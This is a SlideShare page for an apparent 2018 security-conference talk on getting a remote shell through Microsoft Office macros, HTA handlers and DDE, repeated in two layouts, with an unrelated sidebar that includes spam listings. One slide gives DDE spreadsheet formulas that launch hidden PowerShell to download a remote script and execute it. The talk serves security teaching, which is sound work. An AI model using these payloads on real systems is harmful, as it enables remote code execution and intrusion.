SlideShare une entreprise Scribd logo
1  sur  18
GETTING A SHELL THROUGH
MS OFFICE
Velayutham Selvaraj , Msc Digital Forensics & Cyber Crime Analysis
CYBER PHOENIX CONCLAVE 2K18INFORMATION SECURITY CONFERENCE
1
$ ECHO BRAG
CEO of TwinTech Solutions Pvt Ltd
Co-Founder Of Talented Pentesters Hut
Certified CEH ECSA LPT CHFI etc List goes on
Trained 1000’s of Individuals working in Top Mnc like Infosys, TCS etc
FreeLancer
Techincal Author at GB Hackers
Cyber Forensic Researcher
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
2
MACROS HTA DDE
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
3
MACROS
• Microsoft Office documents — Word,
Excel, PowerPoint, and other types of
documents — can contain embedded
code written in a programming language
known as Visual Basic for Applications
• Macros can be embedded with malicious
scripts to execute once enabled
• Still Widely used and some of the more
prominent threats at the time ran forms of
malware such as DRIDEX, ROVNIX and
VAWTRA
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
4
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
5
HTA
• An HTML Application (HTA) is a Microsoft Windows
program whose source code consists of HTML,
Dynamic HTML, and one or more scripting
languages CVE-2017-0199 HTA Handler Vulnerability
• OLE (Object Linking and Embedding) is Microsoft's
framework for a compound document technology.
• Briefly, a compound document is something like a
display desktop that can contain visual and
information objects of all kinds: text, calendars,
animations, sound, motion video, 3-D, continually
updated news, controls, and so forth.
• Part of Microsoft's ActiveX technologies, OLE takes
advantage and is part of a larger, more general
concept, the Component Object Model (COM) and
its distributed version, DCOM.
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
6
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
7
DDE
Dynamic Data Exchange sends messages between applications that share data
and uses shared memory to exchange data between applications.
Applications can use the DDE protocol for one-time data transfers and for
continuous exchanges in which applications send updates to one another as
new data becomes available.
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
8
REAL TIME USES
Linking to real-time data,
such as to stock market
updates, Inventory
management , or process
control.
01
Creating compound
documents, such as a word
processing document that
includes a chart produced
by a graphics application.
02
Using DDE, the chart will
change when the source
data is changed, while the
rest of the document
remains the same.
03
Performing data queries
between applications, such
as a spreadsheet querying a
database for accounts past
due.
04
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
9
TOOLS REQUIRED
KALI LINUX OR METASPLOIT OR EMPIRE
FATRAT
MICROSOFT OFFICE (ANY VERSION)
MICROSOFT WINDOWS
BASIC KNOWLEDGE ABOUT NETWORKING AND PORTFORWARDING
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
10
UNDERSTAND THE CODE
• =cmd|'/c calc.exe'!_xlbgnm.A1
• =cmd|'/c powershell.exe -w hidden $e=(New-Object
System.Net.WebClient).DownloadString("http://192.168.0.8/cyberconclave.ps1");IE
X $e'!_xlbgnm.A1
• =MSEXCEL|'......WindowsSystem32cmd.exe /c powershell.exe -nop -w 1
$e=(New-Object
System.Net.WebClient).DownloadString("http://192.168.0.8/hello.ps1"); IEX
$e'!_xlbgnm.A1
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
11
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
12
DEMO TIME
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
13
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
14
HOW TO BE
SAFE
Buy a good antivirus,
you never leave your
door open.
Do the same for your
computers, laptops &
smart phones
Never keep the same
passwords
Change your
passwords regularly
Use lastpass to store
your passwords
Use veracrypt to
encrypt sensitive
information
There is no 100%
Security nor 100%
Anonymity
Last but not least is
common sense
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
15
THANK YOU
LETS MAKE A
RESPONSIBLE AND SAFE
CYBER WORLD
1
HEED TO ADVICES OF
YOUR FELLOW MEN
2
RESPECT EVERYONE AND
SPREAD LOVE WITHIN
THE COMMUNITY
3
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
16
FEEL FREE TO CONTACT ME
ANYTIME
• VELAYUTHAM@TWINTECHSOLUTIONS.IN
• FB.COM/LAWWAY09
• 9677034266
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
17
SOURCED FROM
• http://searchwindowsserver.techtarget.com/definition/OLE-Object-Linking-and-
Embedding
• https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-
vulnerability/
• https://msdn.microsoft.com/en-
us/library/windows/desktop/ms648774(v=vs.85).aspx
• https://www.harmj0y.net/blog/empyre/os-x-office-macros-with-empyre/
• https://github.com/Screetsec/TheFatRat
• https://www.kali.org/downloads/
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
18

Contenu connexe

Similaire à Getting a Shell Through MS Office

Martin Koons Resume 2015
Martin Koons Resume 2015Martin Koons Resume 2015
Martin Koons Resume 2015Marty Koons
 
Best software development tools in 2021
Best software development tools in 2021Best software development tools in 2021
Best software development tools in 2021Samaritan InfoTech
 
John Haggins Res2015
John Haggins Res2015John Haggins Res2015
John Haggins Res2015John Haggins
 
An isas presentation on .net framework 2.0 by vikash chandra das
An isas presentation on .net framework 2.0 by vikash chandra dasAn isas presentation on .net framework 2.0 by vikash chandra das
An isas presentation on .net framework 2.0 by vikash chandra dasVikash Chandra Das
 
Introducing the Open Container Project
Introducing the Open Container ProjectIntroducing the Open Container Project
Introducing the Open Container ProjectAndrew Kennedy
 
Article 1Discussion point Topic Computerized Operating Syst.docx
Article 1Discussion point Topic Computerized Operating Syst.docxArticle 1Discussion point Topic Computerized Operating Syst.docx
Article 1Discussion point Topic Computerized Operating Syst.docxrossskuddershamus
 
Online lg prodect
Online lg prodectOnline lg prodect
Online lg prodectYesu Raj
 
Crash Course in Open Source Cloud Computing
Crash Course in Open Source Cloud ComputingCrash Course in Open Source Cloud Computing
Crash Course in Open Source Cloud ComputingMark Hinkle
 
Gervais Peter Resume Oct :2015
Gervais Peter Resume Oct :2015Gervais Peter Resume Oct :2015
Gervais Peter Resume Oct :2015Peter Gervais
 
SLUGUK BUILD Round-up
SLUGUK BUILD Round-upSLUGUK BUILD Round-up
SLUGUK BUILD Round-upDerek Lakin
 
A Platform for Application Risk Intelligence
A Platform for Application Risk IntelligenceA Platform for Application Risk Intelligence
A Platform for Application Risk IntelligenceCheckmarx
 
Sreerag dot net - objectives & architecture
Sreerag   dot net - objectives & architectureSreerag   dot net - objectives & architecture
Sreerag dot net - objectives & architectureSreerag Gopinath
 
Introduction to vb.net
Introduction to vb.netIntroduction to vb.net
Introduction to vb.netsuraj pandey
 

Similaire à Getting a Shell Through MS Office (20)

dot NET Framework
dot NET Frameworkdot NET Framework
dot NET Framework
 
Mohamed Mahgoub_CV
Mohamed Mahgoub_CVMohamed Mahgoub_CV
Mohamed Mahgoub_CV
 
Martin Koons Resume 2015
Martin Koons Resume 2015Martin Koons Resume 2015
Martin Koons Resume 2015
 
Best software development tools in 2021
Best software development tools in 2021Best software development tools in 2021
Best software development tools in 2021
 
C# chap 2
C# chap 2C# chap 2
C# chap 2
 
Windows dna
Windows dnaWindows dna
Windows dna
 
John Haggins Res2015
John Haggins Res2015John Haggins Res2015
John Haggins Res2015
 
An isas presentation on .net framework 2.0 by vikash chandra das
An isas presentation on .net framework 2.0 by vikash chandra dasAn isas presentation on .net framework 2.0 by vikash chandra das
An isas presentation on .net framework 2.0 by vikash chandra das
 
Introducing the Open Container Project
Introducing the Open Container ProjectIntroducing the Open Container Project
Introducing the Open Container Project
 
Article 1Discussion point Topic Computerized Operating Syst.docx
Article 1Discussion point Topic Computerized Operating Syst.docxArticle 1Discussion point Topic Computerized Operating Syst.docx
Article 1Discussion point Topic Computerized Operating Syst.docx
 
Mca 504 dotnet_unit1
Mca 504 dotnet_unit1Mca 504 dotnet_unit1
Mca 504 dotnet_unit1
 
Online lg prodect
Online lg prodectOnline lg prodect
Online lg prodect
 
Documentation
DocumentationDocumentation
Documentation
 
Crash Course in Open Source Cloud Computing
Crash Course in Open Source Cloud ComputingCrash Course in Open Source Cloud Computing
Crash Course in Open Source Cloud Computing
 
Gervais Peter Resume Oct :2015
Gervais Peter Resume Oct :2015Gervais Peter Resume Oct :2015
Gervais Peter Resume Oct :2015
 
SLUGUK BUILD Round-up
SLUGUK BUILD Round-upSLUGUK BUILD Round-up
SLUGUK BUILD Round-up
 
A Platform for Application Risk Intelligence
A Platform for Application Risk IntelligenceA Platform for Application Risk Intelligence
A Platform for Application Risk Intelligence
 
Cloud Computing
Cloud ComputingCloud Computing
Cloud Computing
 
Sreerag dot net - objectives & architecture
Sreerag   dot net - objectives & architectureSreerag   dot net - objectives & architecture
Sreerag dot net - objectives & architecture
 
Introduction to vb.net
Introduction to vb.netIntroduction to vb.net
Introduction to vb.net
 

Dernier

Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 

Dernier (20)

Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 

Getting a Shell Through MS Office

  • 1. GETTING A SHELL THROUGH MS OFFICE Velayutham Selvaraj , Msc Digital Forensics & Cyber Crime Analysis CYBER PHOENIX CONCLAVE 2K18INFORMATION SECURITY CONFERENCE 1
  • 2. $ ECHO BRAG CEO of TwinTech Solutions Pvt Ltd Co-Founder Of Talented Pentesters Hut Certified CEH ECSA LPT CHFI etc List goes on Trained 1000’s of Individuals working in Top Mnc like Infosys, TCS etc FreeLancer Techincal Author at GB Hackers Cyber Forensic Researcher ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 2
  • 3. MACROS HTA DDE ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 3
  • 4. MACROS • Microsoft Office documents — Word, Excel, PowerPoint, and other types of documents — can contain embedded code written in a programming language known as Visual Basic for Applications • Macros can be embedded with malicious scripts to execute once enabled • Still Widely used and some of the more prominent threats at the time ran forms of malware such as DRIDEX, ROVNIX and VAWTRA ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 4
  • 5. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 5
  • 6. HTA • An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages CVE-2017-0199 HTA Handler Vulnerability • OLE (Object Linking and Embedding) is Microsoft's framework for a compound document technology. • Briefly, a compound document is something like a display desktop that can contain visual and information objects of all kinds: text, calendars, animations, sound, motion video, 3-D, continually updated news, controls, and so forth. • Part of Microsoft's ActiveX technologies, OLE takes advantage and is part of a larger, more general concept, the Component Object Model (COM) and its distributed version, DCOM. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 6
  • 7. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 7
  • 8. DDE Dynamic Data Exchange sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 8
  • 9. REAL TIME USES Linking to real-time data, such as to stock market updates, Inventory management , or process control. 01 Creating compound documents, such as a word processing document that includes a chart produced by a graphics application. 02 Using DDE, the chart will change when the source data is changed, while the rest of the document remains the same. 03 Performing data queries between applications, such as a spreadsheet querying a database for accounts past due. 04 ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 9
  • 10. TOOLS REQUIRED KALI LINUX OR METASPLOIT OR EMPIRE FATRAT MICROSOFT OFFICE (ANY VERSION) MICROSOFT WINDOWS BASIC KNOWLEDGE ABOUT NETWORKING AND PORTFORWARDING ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 10
  • 11. UNDERSTAND THE CODE • =cmd|'/c calc.exe'!_xlbgnm.A1 • =cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://192.168.0.8/cyberconclave.ps1");IE X $e'!_xlbgnm.A1 • =MSEXCEL|'......WindowsSystem32cmd.exe /c powershell.exe -nop -w 1 $e=(New-Object System.Net.WebClient).DownloadString("http://192.168.0.8/hello.ps1"); IEX $e'!_xlbgnm.A1 ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 11
  • 12. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 12
  • 13. DEMO TIME ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 13
  • 14. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 14
  • 15. HOW TO BE SAFE Buy a good antivirus, you never leave your door open. Do the same for your computers, laptops & smart phones Never keep the same passwords Change your passwords regularly Use lastpass to store your passwords Use veracrypt to encrypt sensitive information There is no 100% Security nor 100% Anonymity Last but not least is common sense ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 15
  • 16. THANK YOU LETS MAKE A RESPONSIBLE AND SAFE CYBER WORLD 1 HEED TO ADVICES OF YOUR FELLOW MEN 2 RESPECT EVERYONE AND SPREAD LOVE WITHIN THE COMMUNITY 3 ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 16
  • 17. FEEL FREE TO CONTACT ME ANYTIME • VELAYUTHAM@TWINTECHSOLUTIONS.IN • FB.COM/LAWWAY09 • 9677034266 ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 17
  • 18. SOURCED FROM • http://searchwindowsserver.techtarget.com/definition/OLE-Object-Linking-and- Embedding • https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler- vulnerability/ • https://msdn.microsoft.com/en- us/library/windows/desktop/ms648774(v=vs.85).aspx • https://www.harmj0y.net/blog/empyre/os-x-office-macros-with-empyre/ • https://github.com/Screetsec/TheFatRat • https://www.kali.org/downloads/ ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS 18

Notes de l'éditeur

  1. There’s a great 2011 StackOverflow post that describes how to use the system() call exposed from libc in order to execute shell commands from VBA macro scripts.